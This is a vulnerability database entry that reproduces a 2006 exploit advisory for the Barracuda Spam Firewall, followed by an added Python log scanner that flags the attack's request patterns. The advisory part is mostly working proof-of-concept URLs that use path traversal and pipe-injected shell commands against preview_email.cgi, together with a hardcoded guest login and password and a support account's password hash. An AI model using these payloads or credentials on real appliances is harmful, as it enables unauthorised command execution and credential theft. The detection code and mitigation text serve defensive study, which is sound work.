Vendor: Barracuda Spam Firewall
By: Greg Sinclair
N/A
CVSS
HIGH
Arbitrary File Disclosure + Command Execution
20
CWE
Product Name: Barracuda Spam Firewall
Affected Version From: 3.3.01.001
Affected Version To: 3.3.03.053
Patch Exists: NO
Related CWE: N/A
CPE: a:barracuda_networks:barracuda_spam_firewall
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2006

Barracuda Arbitrary File Disclosure + Command Execution

Barracuda Spam Firewall versions 3.3.01.001 to 3.3.03.053 are affected by an arbitrary file disclosure and command execution vulnerability. An attacker can exploit this vulnerability to disclose sensitive information and execute arbitrary commands on the affected device.

Mitigation:

Apply the necessary security patches provided by Barracuda Networks. Upgrade to a non-vulnerable version of the Barracuda Spam Firewall.
Source

Exploit-DB raw data:

Title: Barracuda Arbitrary File Disclosure + Command Execution
Severity: High (Sensitive Information Disclosure)
Date: 01 August 2006
Version Affected: Barracuda Spam Firewall version 3.3.01.001 to 3.3.03.053
Discovered by: Greg Sinclair
Credits: Matthew Hall
Update: 07 August 2006
Updated by: PATz
 
####################################################################
 
Proof of Concept:
https://<deviceIP>/cgi-bin/preview_email.cgi?file=/mail/mlog/../tmp/backup/periodic_config.txt.tmp
https://<deviceIP>/cgi-bin/preview_email.cgi?file=/mail/mlog/../../bin/ls%20/|
 
 
####################################################################
 
#using |unix| for command execution:
 
https://<deviceIP>/cgi-bin/preview_email.cgi?file=/mail/mlog/|uname%20-a|

#admin login/pass vuln
 
https://<deviceIP>/cgi-bin/preview_email.cgi?file=/mail/mlog|cat%20update_admin_passwd.pl|
https://<deviceIP>/cgi-bin/preview_email.cgi?file=/mail/mlog/../bin/update_admin_passwd.pl
 
eg.

#`/home/emailswitch/code/firmware/current/bin/updateUser.pl guest phteam99 2>&1`;
login: guest pass: phteam99

Some folders are accessible via HTTP without permission:
https://<deviceIP>/Translators/
https://<deviceIP>/images/
https://<deviceIP>/locale
https://<deviceIP>/plugins
https://<deviceIP>/help
 
#stuff in do_install
 
/usr/sbin/useradd support -s /home/emailswitch/code/firmware/current/bin/request_support.pl -p swUpHFjf1MUiM
 
## Create backup tmp dir

/bin/mkdir -p /mail/tmp/backup/
chmod -R 777 /mail/tmp/
 
## Create smb backup mount point
/bin/mkdir -p /mnt/smb/
chmod 777 /mnt/smb/
 
.................................
Greetz to all noypi and phteam ^^,
.............eof.................

# milw0rm.com [2006-08-08]
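
A log check for the request patterns shown in the proof of concept above, as an added example that is not part of the original advisory: it flags `preview_email.cgi` requests whose decoded `file` parameter contains a pipe character or resolves outside `/mail/mlog`. The allowed root (inferred from the `/mail/mlog/` prefix in the advisory's URLs), the access-log format and the sample log lines are assumptions constructed for illustration.

```python
import posixpath
import re
from urllib.parse import urlsplit, parse_qs

# Assumption: the script is meant to serve files only from this directory,
# inferred from the /mail/mlog/ prefix used in the advisory's URLs.
ALLOWED_ROOT = "/mail/mlog"
TARGET_SCRIPT = "/cgi-bin/preview_email.cgi"
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

# Constructed sample access-log lines (combined log format, documentation IPs).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Aug/2006:10:00:00 +0000] "GET /cgi-bin/preview_email.cgi'
    '?file=/mail/mlog/msg-0001.txt HTTP/1.1" 200 512',
    '203.0.113.5 - - [01/Aug/2006:10:01:00 +0000] "GET /cgi-bin/preview_email.cgi'
    '?file=/mail/mlog/../tmp/backup/periodic_config.txt.tmp HTTP/1.1" 200 4096',
    '203.0.113.5 - - [01/Aug/2006:10:02:00 +0000] "GET /cgi-bin/preview_email.cgi'
    '?file=/mail/mlog/|uname%20-a| HTTP/1.1" 200 80',
    '192.0.2.10 - - [01/Aug/2006:10:03:00 +0000] "GET /images/logo.gif HTTP/1.1" 200 900',
]

def classify_file_param(value):
    """Return the reasons a URL-decoded `file` value is suspicious (empty if none)."""
    reasons = []
    if "|" in value:
        reasons.append("pipe")  # pipe metacharacter, as in the |unix| requests
    resolved = posixpath.normpath(value)  # collapses ../ segments lexically
    if resolved != ALLOWED_ROOT and not resolved.startswith(ALLOWED_ROOT + "/"):
        reasons.append("outside-root")  # path escapes the expected directory
    return reasons

def scan(log_lines):
    """Return (line_number, decoded_value, reasons) for each suspicious request."""
    findings = []
    for number, line in enumerate(log_lines, 1):
        match = REQUEST_RE.search(line)
        if not match:
            continue
        url = urlsplit(match.group(1))
        if url.path != TARGET_SCRIPT:
            continue
        # parse_qs percent-decodes values, so %20 and %7C are seen in plain form.
        for value in parse_qs(url.query, keep_blank_values=True).get("file", []):
            reasons = classify_file_param(value)
            if reasons:
                findings.append((number, value, reasons))
    return findings

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

The same two checks, applied to the decoded value before the file is opened, are what server-side validation of this parameter would need to enforce.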